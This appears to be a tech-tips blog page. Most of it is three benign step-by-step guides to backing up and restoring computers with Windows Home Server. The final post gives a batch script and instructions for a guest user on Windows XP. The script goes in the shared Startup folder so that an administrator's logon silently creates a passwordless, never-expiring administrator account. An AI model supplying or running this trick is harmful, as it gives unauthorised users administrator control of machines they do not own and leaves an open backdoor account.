Wednesday, May 22, 2013

on Leave a Comment

Configure Your Computer to Backup to Windows Home Server

Configure Your Computer to Backup to Windows Home Server

One of the cool features of Windows Home Server is being able to set backups of the other computers on your network to the server. Today we take a look at the process of configuring a computer on your network to be backed up automatically to WHS.

Backup to WHS

To backup a computer your network, open the Windows Home Server Console and select Computers & Backup. Right-click the computer to backup and select Configure Backup.




The Backup Configuration Wizard kicks off…



Wait while the Configuration Wizard collects information…



Choose the disks you want to backup…notice you can also choose external drives if you wish to back them up. Note that the disk needs to be formatted as NTFS, if it’s not then it won’t be displayed in the list.



Now choose the folders you want to exclude from the backup. The grayed out locations are automatically excluded but you may want to remove them from the exclude list. If you want to exclude other folders click on the Add button.



Now go through and select the folders to exclude from the backup. To reduce the size of your backups, you might exclude large media files and unimportant documents, pictures…etc. Make sure you don’t exclude your most important documents, pictures, and other data.



After you’re done excluding folders from the backup, click Next to continue.



Then you’ll have the Congratulations screen showing a summary of the backup size, the time of day backups will occur, and the backup frequency which is daily.



After the backup process completes you’ll be able to see if a computer has been backed up or not in WHS Console.



If you want to change the time of day backups occur, click on Settings in WHS Console then Backup. Under Backup Time you can change the start and end time to what fits your schedule.



To view a backup just right-click on the computer and select View Backups.



It opens the View Backups window where you can verify and manage your computer’s backups.



Conclusion

This will get you started with backups and you’ll have peace of mind knowing that your computer’s data is being backed up to the server. The process is relatively simple and the main thing is to make sure the backups aren’t needlessly large with unnecessary files (such as large multimedia files). There’s a lot more administration you can do with backups, and we’ll be taking a detailed look at managing them in future posts…so stay tuned. Remember that you can download a free 30 day trial of Windows Home Server, so if you have an extra machine you can dedicate to being a server, you might want to check it out.
on Leave a Comment

Restore Files from Backups on Windows Home Server


Restore Files from Backups on Windows Home Server

If you use Windows Home Server to backup the machines on your network, your in luck if you accidentally delete important files or they become corrupted. Today we take a look at getting your data back from backups on your home server.

Open Windows Home Server Console and click select the Computers and Backup tab. Right-click on the computer you need to restore files for and select View Backups.

This will open a list of your recent backups. Highlight the one you want to open, then click the Open button in the Restore or View Files section.



If this is the first time you’re restoring a file, you’ll be asked to verify installation of the device software. Check the box next to Always trust software from Microsoft Corporation and click Install.



Now wait while the backup data is retrieved.



After the backup data has been retrieved, an explorer windows opens up to drive (Z:) which is the backup data. It’s just like if you were opening a drive on your local machine. Now you can browse through the backup and find the files your missing. You can open the files directly, or drag them onto your machine to the location you want to restore them.

Restoring your data is actually a very easy process with Windows Home Server. Of course you’ll want to make sure the computers on your network are being backed up to WHS.
on Leave a Comment

Backup Windows Home Server Folders to an External Hard Drive

Backup Windows Home Server Folders to an External Hard Drive

Using Windows Home Server to backup computers on your local network is a great tool for your backup strategy. But what about backing up the data on the server itself? Here we take a look at using an external drive to backup some of your important data.

Adding External Drive for WHS Folder Backup

After plugging in the external drive open Windows Home Server Console and you’ll see the drive listed and that it’s not added yet. Right-click and select Add from the menu.



The Add a Hard Drive Wizard kicks off…



In the next screen it’s important to select the radio button next to Use this hard drive to back up files that are stored on your home server. Otherwise WHS will add it as additional storage for your data which is not what we want.



If the drive isn’t formatted as NTFS yet, select the radio button next to Yes, format this hard drive. If you’re not sure select this option anyway as formatting it again won’t hurt anything.



Create a name for the hard drive…



At the warning screen go ahead and click finish. If you want to make any changes at this point you can go back and make them.



Now wait while the drive is formatted and added to the server.



The drive has been successfully added and you can click Done.



Now when you go into WHS console you’ll see the drive added under Server Backup Hard Drives.



Backup Folders to External Drive

Now that the drive is set up and ready to be used it’s time to back up server files to it. In WHS Console go to Computers and Backup and you’ll see your server listed as Not backed up under Status. Right-click on the server and select Backup Now.



Here you can go through and decide which folders of data you want to be backed up to the external drive we just added. Check the box next to Remember these setting for future backups then click Backup Now.



The backup starts and you can hide the progress box or stop the backup at any time if you need to.



The amount of time it takes to backup will vary depending on the amount of data being backup. When it has successfully completed, you can close out of the Backup Now screen.



Go back to WHS Console and you’ll see the server has been backed up with the time and date.



Remove Drive

You might want to remove the drive and store it in a safe place. The best method for removing the backup drive is to going into Server Storage, right-click on the drive and select Remove.



Then you’re presented with the the choice to temporarily remove it or stop using it for backups. If you plan to use it again select to temporarily remove it.



If you ever need to get you data back from the external drive, you don’t need to add it back to WHS. You can plug it into any computer. When you open the drive you’ll see the backed up Shares and you can get the files you need.



This is a good process if you want to manually backup the data on your Windows Home Server from time to time. In future articles we’ll be covering automated backup solutions locally, over a LAN, and online backup as well. You might also want to check out our article on how to configure your computer to backup to Windows Home Server.

Saturday, November 13, 2010

on 2 comments

Create a Admin Account if u r a Guest in Xp



@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin

now copy this to notepad and save as admin.bat

copy the file to the statup folder.
here is the path of startup folder.


C:\Documents and Settings\All Users\Start Menu\Programs\Startup


when the admin logs on the batch file runs and the admin acc is created...

so nxt time u log on u can use the username:admin
password:no
Powered by Blogger.

Blogroll

SOFTWARES

About

mix

About

TRICKS